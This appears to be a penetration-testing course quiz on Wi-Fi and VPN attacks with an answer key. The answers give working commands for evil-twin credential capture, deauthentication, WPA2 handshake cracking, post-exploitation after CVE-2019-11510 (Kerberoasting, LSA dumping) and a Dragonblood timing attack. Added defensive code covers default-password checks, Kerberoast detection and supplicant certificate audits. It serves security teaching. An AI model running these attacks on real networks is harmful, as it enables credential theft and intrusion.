Chapter 3.4 Quiz - Wireless & VPN Attack Techniques
Quiz Mode - All answers are hidden under collapsible sections. Attempt each question before revealing the answer.
Question 1
You run airodump-ng wlan0mon and observe a corporate network CorpNet with WPA2-Enterprise (AUTH: MGT) and no clients currently connected. You cannot wait hours for a client. Describe the attack path that can still yield crackable credentials without any client being present.
Reveal Answer
Answer: Deploy a rogue AP (evil twin) using hostapd-wpe or eaphammer to intercept EAP authentication when clients connect - and use the PMKID attack against the AP itself for WPA2-Personal context (not applicable here), or harvest MSCHAPv2 credentials when the first client associates.
More specifically for WPA2-Enterprise with no clients:
The correct attack is a rogue RADIUS evil twin - you don't need existing clients captured; you wait for them to arrive and authenticate to your AP instead of the real one.
```bash
# Step 1: Configure eaphammer matching the target enterprise network
# (--essid must match the real SSID exactly; --negotiate gtc-downgrade tries to
#  force EAP-GTC, which carries the password in plaintext; --creds captures credentials)
python3 eaphammer \
  -i wlan0 \
  --channel 6 \
  --auth wpa-eap \
  --essid "CorpNet" \
  --negotiate gtc-downgrade \
  --creds

# Step 2: If GTC downgrade fails, fall back to PEAP/MSCHAPv2 capture
python3 eaphammer \
  -i wlan0 \
  --channel 6 \
  --auth wpa-eap \
  --essid "CorpNet" \
  --creds
# Captures the MSCHAPv2 challenge/response when a client connects

# Step 3: Deauthenticate clients from the real AP to force re-association to yours
# (Active - only after the rogue AP is running; --deauth 0 means continuous)
aireplay-ng \
  --deauth 0 \
  -a <real_AP_BSSID> \
  wlan0mon

# Step 4: Crack the captured MSCHAPv2 challenge/response
asleap \
  -C <challenge> \
  -R <response> \
  -W /usr/share/wordlists/rockyou.txt
```
Key defensive control defeated by this attack: Clients that don't validate the RADIUS server certificate (no ca_cert in wpa_supplicant.conf) will authenticate to any RADIUS server, including a rogue one. The fix is strict certificate validation with subject pinning.
MITRE ATT&CK: T1557.004 (Adversary-in-the-Middle: Wi-Fi), T1465 (Rogue Wi-Fi Access Point)
Question 2
A penetration tester captures a 4-way handshake for a WPA2-PSK network named HomeNetwork_5G. After 12 hours of cracking with rockyou.txt and best64 rules, there is no result. The client's router was purchased in 2021 from a major ISP. What two alternative cracking strategies should be tried next, and why are they appropriate for this specific scenario?
Reveal Answer
Answer:
Strategy 1: ISP default password mask attack
Most ISPs ship routers with a default password printed on a label - typically a fixed-length pattern of digits, alphanumerics, or a dictionary word + number combination. These patterns are well-documented and trivially maskable:
```bash
# Common ISP default formats:
# 8 lowercase + 4 digits (many UK/EU ISPs)
hashcat -m 22000 handshake.hc22000 \
  -a 3 "?l?l?l?l?l?l?l?l?d?d?d?d"

# 10 digits (some US cable ISPs)
hashcat -m 22000 handshake.hc22000 \
  -a 3 "?d?d?d?d?d?d?d?d?d?d"

# Serial-number-style pattern: 4 uppercase + 2 lowercase + 4 digits
hashcat -m 22000 handshake.hc22000 \
  -a 3 "?u?u?u?u?l?l?d?d?d?d"

# Hybrid: ISP brand word + digits
hashcat -m 22000 handshake.hc22000 \
  -a 6 /tmp/isp_words.txt "?d?d?d?d?d?d?d?d"

# SSID-based password (very common): router uses SSID suffix as password seed
# "HomeNetwork_5G" → try "Network5G", "5G12345678", last 8 of BSSID
# (hashcat reads candidates from stdin when no wordlist is given in -a 0 mode)
echo "HomeNetwork5G" | hashcat -m 22000 handshake.hc22000
```
Strategy 2: BSSID-seeded default password generation
Many router models generate their default Wi-Fi password algorithmically from the BSSID (MAC address). Tools like routersploit and dedicated wordlist generators exploit this:
```bash
# Extract BSSID from capture
hcxpcapngtool --info=stdout handshake.hc22000 | grep "BSSID"
# e.g., BSSID = AA:BB:CC:DD:EE:FF

# RouterKeygen - generates default keys for common router models
# based on BSSID, SSID, and model-specific algorithms
python3 routerkeygen.py \
  --bssid AA:BB:CC:DD:EE:FF \
  --ssid "HomeNetwork_5G"

# wpa-sec known default password databases
# https://wpa-sec.stanev.org - submit hash, check against known defaults

# Identify router vendor from BSSID OUI (first 3 octets)
curl -s "https://api.macvendors.com/AA:BB:CC"
# Knowing "ARRIS", "Technicolor", "Sagemcom" etc. narrows the default key algorithm
```
Why these are appropriate: rockyou.txt fails because ISP default passwords are not common human-chosen passwords - they're algorithmically generated strings that don't appear in breach databases. The 2021 purchase date and ISP-provided nature strongly suggest the default label password is still in use - many home users never change it.
MITRE ATT&CK: T1110.002 (Brute Force: Password Cracking)
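Turned around for the defender, as an added example that is not part of the quiz: a small Python translator for hashcat mask syntax, used to flag Wi-Fi passphrases that still have the shape of the ISP default patterns quoted in this answer (the sample passphrases and the custom-charset handling are constructed, not taken from the page).

```python
import re

# hashcat built-in charsets as regex character-class bodies (?b, any byte, is omitted)
SPECIALS = re.escape(" !\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~")
CHARSETS = {"l": "a-z", "u": "A-Z", "d": "0-9", "h": "0-9a-f", "H": "0-9A-F",
            "s": SPECIALS, "a": "a-zA-Z0-9" + SPECIALS}

def mask_to_regex(mask, custom=None):
    """Translate a hashcat -a 3 mask into an anchored regex.
    custom maps '1'..'4' to the literal characters of a -1..-4 custom charset."""
    custom = custom or {}
    out, i = [], 0
    while i < len(mask):
        c = mask[i]
        if c == "?" and i + 1 < len(mask):
            spec = mask[i + 1]
            if spec == "?":                      # '??' is a literal question mark
                out.append(r"\?")
            elif spec in CHARSETS:
                out.append("[" + CHARSETS[spec] + "]")
            elif spec in custom:
                out.append("[" + re.escape(custom[spec]) + "]")
            else:
                raise ValueError(f"unknown charset ?{spec} in mask {mask!r}")
            i += 2
        else:                                    # any other character is literal
            out.append(re.escape(c))
            i += 1
    return re.compile("^" + "".join(out) + "$")

# The masks from the answer above, used the other way round: a passphrase that
# matches one of them is shaped like a vendor default and should be replaced.
ISP_DEFAULT_MASKS = [
    "?l?l?l?l?l?l?l?l?d?d?d?d",   # 8 lowercase + 4 digits
    "?d?d?d?d?d?d?d?d?d?d",       # 10 digits
    "?u?u?u?u?l?l?d?d?d?d",       # 4 upper + 2 lower + 4 digits
]

def matching_default_masks(passphrase, masks=ISP_DEFAULT_MASKS):
    """Return the masks a passphrase fits; an empty list means it is not default-shaped."""
    return [m for m in masks if mask_to_regex(m).match(passphrase)]
```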
Question 3
During an external penetration test you identify that the target's VPN gateway runs Pulse Secure version 9.0R1. CVE-2019-11510 is confirmed exploitable. After reading the session file, you find a username/password pair. Describe the next three steps to move from this credential to domain access.
Reveal Answer
Answer:
Step 1 - Authenticate to the VPN with the obtained credential
```bash
# Use the extracted credentials to establish a legitimate VPN session
# The path traversal gave us: username=jsmith, password=P@ssw0rd123
# Connect via OpenConnect (open-source client; --protocol=pulse selects Pulse Secure)
openconnect \
  --protocol=pulse \
  --user=jsmith \
  vpn.target-corp.com
# Enter password when prompted
# Alternatively use the official Pulse Secure client
# Or test via web login: https://vpn.target-corp.com
```
Step 2 - Establish network connectivity and enumerate the internal network
Once the VPN session is up, you have a routed path into the corporate network:
```bash
# Check what routes were pushed by the VPN
ip route show          # What subnets are now accessible?
cat /etc/resolv.conf   # What internal DNS server was assigned?

# Discover live hosts in the internal range
nmap -sn 10.0.0.0/8 --min-rate 500   # Ping sweep

# Enumerate internal DNS - get a host map for free
dig axfr @<internal_dns_ip> corp.local   # Attempt zone transfer
# Or reverse lookup the DC range:
for i in $(seq 1 254); do
  host 10.0.1.$i <internal_dns_ip> 2>/dev/null | grep "domain name pointer"
done

# Find the Domain Controller
nmap -p 88,389,445,636 10.0.0.0/24 --open   # Kerberos + LDAP + SMB = DC
```
Step 3 - Leverage the credential for AD authentication and lateral movement
```bash
# The VPN credential is likely also a domain credential - test it directly
cme smb 10.0.1.0/24 \
  -u jsmith \
  -p 'P@ssw0rd123' \
  -d CORP \
  --continue-on-success

# If domain credential confirmed - enumerate AD
# (target is DOMAIN/user:password; the DC is given with -dc-ip)
impacket-GetUserSPNs \
  "CORP/jsmith:P@ssw0rd123" \
  -dc-ip 10.0.1.10 \
  -request   # Kerberoast all SPNs immediately

# Enumerate all AD users for AS-REP roasting
impacket-GetNPUsers \
  "CORP/jsmith:P@ssw0rd123" \
  -dc-ip 10.0.1.10 \
  -format hashcat

# Check if jsmith has local admin anywhere (often VPN users are IT staff)
cme smb 10.0.0.0/24 -u jsmith -p 'P@ssw0rd123' -d CORP

# Dump LSA secrets on any host where jsmith is local admin
cme smb 10.0.1.50 \
  -u jsmith -p 'P@ssw0rd123' -d CORP \
  --lsa
```
MITRE ATT&CK: T1190 (Exploit Public-Facing Application: CVE-2019-11510), T1078 (Valid Accounts), T1021.002 (Remote Services: SMB)
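A detection-side counterpart to Step 3, added here and not from the quiz: the Kerberoast burst that `-request` produces shows up in Domain Controller Security logs as many Event ID 4769 service-ticket requests with RC4 (0x17) encryption from one account within seconds. The records, field layout and thresholds below are constructed for the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Event ID 4769 (Kerberos service ticket requested) records, not real
# logs: one VPN user requesting RC4 tickets for many SPNs within seconds, plus
# ordinary AES-encrypted requests and an isolated RC4 request as background noise.
EVENTS = [
    ("2024-05-01T09:00:01", "jsmith@CORP.LOCAL", "MSSQLSvc/sql01.corp.local:1433", "0x17"),
    ("2024-05-01T09:00:02", "jsmith@CORP.LOCAL", "HTTP/web01.corp.local", "0x17"),
    ("2024-05-01T09:00:02", "jsmith@CORP.LOCAL", "MSSQLSvc/sql02.corp.local:1433", "0x17"),
    ("2024-05-01T09:00:03", "jsmith@CORP.LOCAL", "exchangeMDB/mail01.corp.local", "0x17"),
    ("2024-05-01T09:00:03", "jsmith@CORP.LOCAL", "CIFS/fs01.corp.local", "0x17"),
    ("2024-05-01T09:00:04", "jsmith@CORP.LOCAL", "TERMSRV/ts01.corp.local", "0x17"),
    ("2024-05-01T09:00:05", "jsmith@CORP.LOCAL", "WS01$", "0x12"),
    ("2024-05-01T09:00:10", "alice@CORP.LOCAL", "CIFS/fs01.corp.local", "0x12"),
    ("2024-05-01T09:01:00", "alice@CORP.LOCAL", "HTTP/web01.corp.local", "0x12"),
    ("2024-05-01T09:00:20", "bob@CORP.LOCAL", "MSSQLSvc/sql01.corp.local:1433", "0x17"),
    ("2024-05-01T09:20:00", "bob@CORP.LOCAL", "HTTP/web01.corp.local", "0x17"),
]

RC4_ETYPES = {"0x17", "0x18"}   # RC4-HMAC / RC4-HMAC-EXP: ticket is crackable offline

def roastable(service):
    """Skip computer accounts (long random passwords) and the krbtgt TGT itself."""
    return not service.endswith("$") and not service.lower().startswith("krbtgt")

def detect_kerberoast(events, threshold=5, window=timedelta(minutes=5)):
    """Return {user: n} for users whose RC4 TGS requests cover >= threshold distinct
    SPNs inside any window; n is the largest such count seen."""
    by_user = defaultdict(list)
    for ts, user, service, etype in events:
        if etype.lower() in RC4_ETYPES and roastable(service):
            by_user[user].append((datetime.fromisoformat(ts), service))
    alerts = {}
    for user, reqs in by_user.items():
        reqs.sort()
        best = 0
        for i, (t0, _) in enumerate(reqs):   # sliding window starting at each request
            best = max(best, len({svc for t, svc in reqs[i:] if t - t0 <= window}))
        if best >= threshold:
            alerts[user] = best
    return alerts
```

Tuning the threshold against a baseline of normal RC4 usage matters: a single legacy service still on RC4 will not trip it, while a burst across unrelated SPNs will.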
Question 4
A security engineer says "We use WPA3 everywhere so we're safe from Wi-Fi credential attacks." Identify three specific conditions under which WPA3 deployments remain vulnerable to credential or session compromise, with the technical mechanism for each.
Reveal Answer
Answer:
Condition 1: WPA3 Transition Mode (mixed WPA2/WPA3)
Most WPA3 deployments run in transition mode to support legacy clients. The AP advertises both WPA3-SAE and WPA2-PSK. An attacker sets up an evil twin advertising only WPA2, and WPA3-capable clients that haven't enabled mandatory WPA3 will downgrade and connect with WPA2.
```bash
# Verify transition mode
airodump-ng wlan0mon | grep "SAE+PSK"   # Transition mode indicator
# Deploy WPA2-only evil twin with same SSID
# Client downgrades → 4-way handshake captured → offline crack possible
# (Defeats SAE's offline cracking resistance entirely)
```
Condition 2: Dragonblood Side-Channel Attacks (CVE-2019-9494)
The SAE Dragonfly handshake's timing and cache access patterns during the hunting-and-pecking algorithm vary based on the password. An attacker performing many SAE interactions and measuring response times can construct an oracle that significantly reduces the passphrase search space.
```bash
python3 dragonslayer.py \
  --bssid AA:BB:CC:DD:EE:FF \
  --ssid "WPA3Network" \
  -i wlan0mon \
  --attack timing   # Timing oracle - reduces cracking complexity
# After collecting ~thousands of timing samples, partial passphrase bits recovered
# Combined with targeted wordlist - feasible against weak passphrases
```
Condition 3: WPA3-Enterprise with Improper Certificate Validation
WPA3-Enterprise still uses EAP (PEAP/MSCHAPv2 or EAP-TLS) for user authentication. If the client supplicant doesn't validate the RADIUS server certificate, a rogue AP attack is identical to the WPA2-Enterprise case - the SAE layer protects the key exchange but not the EAP authentication inside it.
```bash
# Rogue RADIUS server still works if ca_cert not configured
# (--auth wpa3-eap selects WPA3-Enterprise mode)
python3 eaphammer \
  -i wlan0 \
  --auth wpa3-eap \
  --essid "SecureCorpWPA3" \
  --creds
# If client has no ca_cert pinned → MSCHAPv2 captured → crackable
# WPA3 at L2 does not compensate for missing certificate validation at L7
# Detection gap: many WPA3 enterprise deployments inherited wpa_supplicant
# configurations from WPA2 deployments - missing ca_cert is common
```
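The fix named in Question 1 (ca_cert plus subject pinning) and the inherited-config gap described under Condition 3 can be checked mechanically. This added Python checker is not from the quiz; the wpa_supplicant.conf it parses is constructed, and it reports every EAP network block that lacks ca_cert or any of wpa_supplicant's server-name matching options.

```python
import re
# Constructed wpa_supplicant.conf (not from the quiz): the first EAP block keeps
# WPA2-era defaults (no ca_cert, no server-name match); the second is hardened.
SAMPLE_CONF = """
network={
    ssid="CorpNet"
    key_mgmt=WPA-EAP
    eap=PEAP
    phase2="auth=MSCHAPV2"
}
network={
    ssid="SecureCorpWPA3"
    key_mgmt=WPA-EAP-SHA256
    eap=PEAP
    ca_cert="/etc/ssl/certs/corp-radius-ca.pem"
    domain_match="radius.corp.local"
    phase2="auth=MSCHAPV2"
}
"""
BLOCK_RE = re.compile(r"network=\{(.*?)\}", re.S)
EAP_KEY_MGMT = {"WPA-EAP", "WPA-EAP-SHA256", "WPA-EAP-SUITE-B", "WPA-EAP-SUITE-B-192", "IEEE8021X"}
# wpa_supplicant options that pin the RADIUS server's identity, not just its issuing CA
PIN_KEYS = ("domain_match", "domain_suffix_match", "altsubject_match", "subject_match")

def parse_networks(conf):
    nets = []
    for body in BLOCK_RE.findall(conf):
        kv = {}
        for line in body.splitlines():
            line = line.split("#", 1)[0].strip()          # drop comments and padding
            if "=" in line:
                k, v = line.split("=", 1)
                kv[k.strip()] = v.strip().strip('"')
        nets.append(kv)
    return nets

def audit(conf):
    """Map SSID -> findings for every EAP network; an empty list means hardened."""
    findings = {}
    for net in parse_networks(conf):
        if not set(net.get("key_mgmt", "").split()) & EAP_KEY_MGMT:
            continue  # PSK/SAE networks have no RADIUS server to validate
        issues = []
        if "ca_cert" not in net:
            issues.append("no ca_cert: any RADIUS server certificate is accepted")
        if not any(k in net for k in PIN_KEYS):
            issues.append("no server-name match: any certificate from the CA is accepted")
        findings[net.get("ssid", "?")] = issues
    return findings
```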
Summary table:
| Condition | WPA3 Feature Bypassed | Mechanism |
|---|---|---|
| Transition mode | SAE offline crack resistance | Downgrade to WPA2; 4-way handshake capturable |
| Dragonblood timing | SAE brute-force resistance | Timing oracle reduces passphrase search space |
| No cert validation | EAP session security | Rogue RADIUS captures MSCHAPv2 regardless of SAE |
MITRE ATT&CK: T1557.004, T1465 (Rogue Wi-Fi), T1110.002 (Password Cracking)
End of Quiz 3.4 - Wireless & VPN Attack Techniques